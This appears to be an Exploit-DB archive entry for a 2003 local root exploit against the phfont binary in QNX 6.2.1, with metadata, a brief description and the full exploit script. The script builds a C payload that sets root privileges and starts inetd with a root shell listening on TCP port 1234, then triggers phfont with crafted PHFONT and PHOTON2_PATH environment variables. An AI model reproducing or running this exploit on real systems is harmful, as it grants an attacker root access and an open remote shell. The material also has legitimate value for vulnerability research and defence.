Vendor: QNX 6.2.1
By: kokanin
CVSS: 7.2 (HIGH)
Type: Local Privilege Escalation
CWE: 78
Product Name: QNX 6.2.1
Affected Version From: QNX 6.2.1
Affected Version To: QNX 6.2.1
Patch Exists: YES
Related CWE: N/A
CPE: o:qnx:qnx_6.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: QNX 6.2.1
2006

QNX 6.2.1 phfont Local Root Exploit

This exploit targets a local privilege escalation vulnerability in the phfont binary of QNX 6.2.1. The vulnerability stems from a lack of proper input validation when phfont handles environment variables. By setting the PHFONT and PHOTON2_PATH environment variables, a local attacker can make the binary execute arbitrary code with root privileges.

Mitigation:

The vendor has released a patch to address this vulnerability.

Exploit-DB raw data:

#!/bin/sh
# word, exploit for http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
# greetings and salutations from www.lort.dk
# kokanin@dtors 18/10/2003
# $ cksum /usr/photon/bin/phfont
# 4123428723      30896 /usr/photon/bin/phfont
# $ uname -a
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86 
# payload compiled in the current directory; phfont ends up running it as root
cat > phfontphf.c << __EOF__
#include <stdlib.h>
#include <unistd.h>
/* adds a root shell service on TCP port 1234 to a temporary inetd config and starts inetd on it */
int main(){
setuid(0);
system("echo 1234 stream tcp nowait root  /bin/sh       sh -i>/tmp/dsr && /usr/sbin/inetd /tmp/dsr");
return 0;
}
__EOF__
make phfontphf >/dev/null
# run phfont through a symlink in the current directory with the two environment variables set
ln -s /usr/photon/bin/phfont ./phfont
export PHFONT=hello
export PHOTON2_PATH=mom
./phfont
rm phfont*

# milw0rm.com [2006-02-08]